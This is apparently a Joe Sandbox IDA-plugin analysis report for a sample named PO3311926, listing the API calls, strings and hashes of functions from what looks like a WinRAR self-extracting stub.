Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 188d9c8f905ce972238fa677719a00166e3d3e29984b56496b0b8dd14ed8cdd8
Instruction ID: b26b932785f69def941b4c9122d2c4b3f16069c975bb3288a65215f4ec9304fa
Opcode Fuzzy Hash: 188d9c8f905ce972238fa677719a00166e3d3e29984b56496b0b8dd14ed8cdd8
Instruction Fuzzy Hash: 3031C4B5A05702AFC7109F22DC98D6BBBF8EF84B50B000959F84593262FF71DC44CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6C4

Part of subcall function 00BABB03: _wcslen.LIBCMT ref: 00BABB27

FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA728
GetLastError.KERNEL32(?,?,?,?,00BAA592,000000FF,?,?), ref: 00BAA734

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 91e7ac6fa28c44b192d628f3be9d5e07182272050d8057d37c446b51de968430
Instruction ID: c6343c55ce0eb9d6bb451240027d6b5b0f222340762324117a2825e373aeec37
Opcode Fuzzy Hash: 91e7ac6fa28c44b192d628f3be9d5e07182272050d8057d37c446b51de968430
Instruction Fuzzy Hash: A8418E72900115ABCB25DF68CC84AEAF7F8FB49350F1041E6E569E3210D7346E94CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00BC7DC4,?,00BDC300,0000000C,00BC7F1B,?,00000002,00000000), ref: 00BC7E0F
TerminateProcess.KERNEL32(00000000,?,00BC7DC4,?,00BDC300,0000000C,00BC7F1B,?,00000002,00000000), ref: 00BC7E16
ExitProcess.KERNEL32 ref: 00BC7E28

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2c35ab3358b6d38fd9dc44be54df37d05c9d92978870acf497fc0e7754c8bf2c
Instruction ID: 73dff00b61a62c3d541a3914d9563ab4131a3b307576361d0cda30b4fc89fa03
Opcode Fuzzy Hash: 2c35ab3358b6d38fd9dc44be54df37d05c9d92978870acf497fc0e7754c8bf2c
Instruction Fuzzy Hash: A1E04632001148ABCF016F20CD1AF4ABFEAEB00741F0044A9F809AB133DF36DE92CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00BA848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA8493

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 76d7a32b3fb20111089b3edf78300914771ef8260f99e285ebf2841d92d8ff77
Instruction ID: 74e95970f3cc0c126c62d22433dd55f25e9ed0396408e73c1f7fb7835efba6c4
Opcode Fuzzy Hash: 76d7a32b3fb20111089b3edf78300914771ef8260f99e285ebf2841d92d8ff77
Instruction Fuzzy Hash: 5C82F970908245AEDF25DF64C895BFABBF9EF17300F0845F9E8499B542DB315A84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2bb4b101806af7d08bba43e230e9f2207d48140212e750fcf3b681e3f443416b
Instruction ID: a4350e6b2032f048f28947c530fca6c40942c6b898f6402d93e16cc50fed41c8
Opcode Fuzzy Hash: 2bb4b101806af7d08bba43e230e9f2207d48140212e750fcf3b681e3f443416b
Instruction Fuzzy Hash: 59D196716483458FDB14DF28C8847ABBBE1FF99308F0445ADE8899B242D7B4ED05CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB7E0 Relevance: 104.0, APIs: 49, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BBB7E5

Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB8EF
IsDialogMessageW.USER32(?,?), ref: 00BBB902
TranslateMessage.USER32(?), ref: 00BBB910
DispatchMessageW.USER32(?), ref: 00BBB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00BBB93D
EndDialog.USER32(?,00000001), ref: 00BBB960
GetDlgItem.USER32(?,00000068), ref: 00BBB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BBB99E
SendMessageW.USER32(00000000,000000C2,00000000,00BD35F4), ref: 00BBB9B1

Part of subcall function 00BBD453: _wcslen.LIBCMT ref: 00BBD47D

SetFocus.USER32(00000000), ref: 00BBB9B8
_swprintf.LIBCMT ref: 00BBBA24

Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5

Part of subcall function 00BBD4D4: GetDlgItem.USER32(00000068,00BFFCB8), ref: 00BBD4E8
Part of subcall function 00BBD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00BBAF07,00000001,?,?,00BBB7B9,00BD506C,00BFFCB8,00BFFCB8,00001000,00000000,00000000), ref: 00BBD510
Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BBD51B
Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BD35F4), ref: 00BBD529
Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBD53F
Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BBD559
Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBD59D
Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BBD5AB
Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBD5BA
Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBD5E1
Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BD43F4), ref: 00BBD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00BBBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00BBBA90
GetTickCount.KERNEL32 ref: 00BBBAAE
_swprintf.LIBCMT ref: 00BBBAC2
GetLastError.KERNEL32(?,00000011), ref: 00BBBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00BBBB43
_swprintf.LIBCMT ref: 00BBBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00BBBBD0
GetCommandLineW.KERNEL32 ref: 00BBBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00BBBC47
ShellExecuteExW.SHELL32(0000003C), ref: 00BBBC6F
WaitForInputIdle.USER32(?,00002710), ref: 00BBBCA5
Sleep.KERNEL32(00000064), ref: 00BBBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00BBBCE2
CloseHandle.KERNEL32(00000000), ref: 00BBBCEB
_swprintf.LIBCMT ref: 00BBBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBBD7D
SetDlgItemTextW.USER32(?,00000065,00BD35F4), ref: 00BBBD94
GetDlgItem.USER32(?,00000065), ref: 00BBBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00BBBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BBBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBBE68
_wcslen.LIBCMT ref: 00BBBEBE
_swprintf.LIBCMT ref: 00BBBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00BBBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00BBBF4C
GetDlgItem.USER32(?,00000068), ref: 00BBBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00BBBF6B
GetDlgItem.USER32(?,00000066), ref: 00BBBF85
SetWindowTextW.USER32(00000000,00BEA472), ref: 00BBBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00BBC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00BBC0BD
EnableWindow.USER32(00000000,00000000), ref: 00BBC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00BBC1D9

Part of subcall function 00BBC73F: __EH_prolog.LIBCMT ref: 00BBC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBC1FD

Strings

STARTDLG, xrefs: 00BBB801
"%s"%s, xrefs: 00BBBD0D
-el -s2 "-d%s" "-sp%s", xrefs: 00BBBB6B
%s, xrefs: 00BBBED8
LICENSEDLG, xrefs: 00BBC0B2
C:\Users\user\Desktop, xrefs: 00BBBBC9
@, xrefs: 00BBBB91
winrarsfxmappingfile.tmp, xrefs: 00BBBBA6
__tmp_rar_sfx_access_check_%u, xrefs: 00BBBAB5
<, xrefs: 00BBBB84

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 2472041962-3026011734
Opcode ID: 4c0ac05e4a20252433c8c574b50a51c40c9f0b29ea9a83de42d6728217a44acf
Instruction ID: 5bc3c9da0cad46f46222e4b765793f2d6915253410762914b103856af11931c9
Opcode Fuzzy Hash: 4c0ac05e4a20252433c8c574b50a51c40c9f0b29ea9a83de42d6728217a44acf
Instruction Fuzzy Hash: 7E429171944299ABEB219B649C8AFFE7BFCEB05700F0000D5F645A71E2DBF49A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00BB087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BB088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BB08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BB0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BB0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB0B93
ReadFile.KERNEL32(00000000,?,00007FFE,00BD3C7C,00000000), ref: 00BB0BB1
CloseHandle.KERNEL32(00000000), ref: 00BB0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BB0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00BD3C7C,?,00000000,?,00000800), ref: 00BB0C72
GetFileAttributesW.KERNELBASE(?,?,00BD3C7C,00000800,?,00000000,?,00000800), ref: 00BB0C9C
GetFileAttributesW.KERNEL32(?,?,00BD3D44,00000800), ref: 00BB0CD8

Part of subcall function 00BB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BB0836
Part of subcall function 00BB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAF2D8,Crypt32.dll,00000000,00BAF35C,?,?,00BAF33E,?,?,?), ref: 00BB0858

_swprintf.LIBCMT ref: 00BB0D4A
_swprintf.LIBCMT ref: 00BB0D96

Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5

AllocConsole.KERNEL32 ref: 00BB0D9E
GetCurrentProcessId.KERNEL32 ref: 00BB0DA8
AttachConsole.KERNEL32(00000000), ref: 00BB0DAF
_wcslen.LIBCMT ref: 00BB0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00BB0DD5
WriteConsoleW.KERNEL32(00000000), ref: 00BB0DDC
Sleep.KERNEL32(00002710), ref: 00BB0DE7
FreeConsole.KERNEL32 ref: 00BB0DED
ExitProcess.KERNEL32 ref: 00BB0DF5

Strings

kernel32, xrefs: 00BB0873
dwmapi.dll, xrefs: 00BB0927, 00BB0D0D
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00BB0D84
SetDefaultDllDirectories, xrefs: 00BB08B9
DXGIDebug.dll, xrefs: 00BB08FC, 00BB0C5E
uxtheme.dll, xrefs: 00BB0D17
SetDllDirectoryW, xrefs: 00BB0888

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 376a09342e4bccc37a3e0eddf7cfd05948505260a3fbbeed56ab36ff166df593
Instruction ID: 627f575f32082543846d4bb8b32684a328795cddd6527e41619b41b0fc7405b9
Opcode Fuzzy Hash: 376a09342e4bccc37a3e0eddf7cfd05948505260a3fbbeed56ab36ff166df593
Instruction Fuzzy Hash: 94D167B2019344ABD3319F508859BEFFBE8EB85B04F50499EF18597251EBB08648CB63

Uniqueness

Uniqueness Score: -1.00%

Function 00BADA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BADA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BADAAC

Part of subcall function 00BAC29A: _wcslen.LIBCMT ref: 00BAC2A2

Part of subcall function 00BB05DA: _wcslen.LIBCMT ref: 00BB05E0

Part of subcall function 00BB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BABAE9,00000000,?,?,?,0001042E), ref: 00BB1BA0

_wcslen.LIBCMT ref: 00BADDE9
__fprintf_l.LIBCMT ref: 00BADF1C

Strings

,, xrefs: 00BADF57
$%s:, xrefs: 00BADEFF
@%s:, xrefs: 00BADF06, 00BADF12
R, xrefs: 00BADC0C
*messages***, xrefs: 00BADBC1
RTL, xrefs: 00BADEDE
*messages***, xrefs: 00BADBFA
, xrefs: 00BADD6C
a, xrefs: 00BADC16

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: a4599576532354aac1f7a5608273a4b1a35aec2b8cbbf9427221f3539b7772df
Instruction ID: 17dc9eb29f2d368d1237c105730a3581b88986ede5fd88c47ec2a1a5b0cce3e0
Opcode Fuzzy Hash: a4599576532354aac1f7a5608273a4b1a35aec2b8cbbf9427221f3539b7772df
Instruction Fuzzy Hash: 3C32D3719042189BCF24EF68C882BEE77E5FF16700F4045AAF916A7291E7B1DD85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBB579
Part of subcall function 00BBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB58A
Part of subcall function 00BBB568: IsDialogMessageW.USER32(0001042E,?), ref: 00BBB59E
Part of subcall function 00BBB568: TranslateMessage.USER32(?), ref: 00BBB5AC
Part of subcall function 00BBB568: DispatchMessageW.USER32(?), ref: 00BBB5B6

GetDlgItem.USER32(00000068,00BFFCB8), ref: 00BBD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00BBAF07,00000001,?,?,00BBB7B9,00BD506C,00BFFCB8,00BFFCB8,00001000,00000000,00000000), ref: 00BBD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BBD51B
SendMessageW.USER32(00000000,000000C2,00000000,00BD35F4), ref: 00BBD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BBD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BBD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBD5E1
SendMessageW.USER32(00000000,000000C2,00000000,00BD43F4), ref: 00BBD5F0

Strings

\, xrefs: 00BBD549

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 5bf629d9c2b23d110c9d3fba7d43046fd582c3a12a167eec4cad71cace609326
Instruction ID: 0641710d7f47e949dc5ac369957c38ec6b8245d31223f18bd9304ecc4509b713
Opcode Fuzzy Hash: 5bf629d9c2b23d110c9d3fba7d43046fd582c3a12a167eec4cad71cace609326
Instruction Fuzzy Hash: 7D31E171146796AFE311DF209C4AFAF7FACEB86708F010508F551962A0EB748A04C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD78F Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 184
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00BBD7AE
ShellExecuteExW.SHELL32(?), ref: 00BBD8DE
IsWindowVisible.USER32(?), ref: 00BBD911
ShowWindow.USER32(?,00000000), ref: 00BBD91D
WaitForInputIdle.USER32(?,000007D0), ref: 00BBD92E
GetExitCodeProcess.KERNEL32(?,?), ref: 00BBD959
CloseHandle.KERNEL32(?), ref: 00BBD97F
ShowWindow.USER32(?,00000001), ref: 00BBD9E1

Strings

.exe, xrefs: 00BBD989
.inf, xrefs: 00BBD89A

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
String ID: .exe$.inf
API String ID: 3646668279-3750412487
Opcode ID: 481705dd2077e720c36f9313d187f985141078144c13963687c7ba32c8d82197
Instruction ID: 5791313defbd4fec13adbf8f52286c8693c32d31d0ce55d59303bac0a7249ccc
Opcode Fuzzy Hash: 481705dd2077e720c36f9313d187f985141078144c13963687c7ba32c8d82197
Instruction Fuzzy Hash: EB51B1705083809BDB319B249854BFBBBE4EF46744F04089EF5C5972A1FBF98985C752

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BC57FB,00BC57FB,?,?,?,00BCABAC,00000001,00000001,2DE85006), ref: 00BCA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BCABAC,00000001,00000001,2DE85006,?,?,?), ref: 00BCAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BCAB35
__freea.LIBCMT ref: 00BCAB42

Part of subcall function 00BC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38

__freea.LIBCMT ref: 00BCAB4B
__freea.LIBCMT ref: 00BCAB70

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
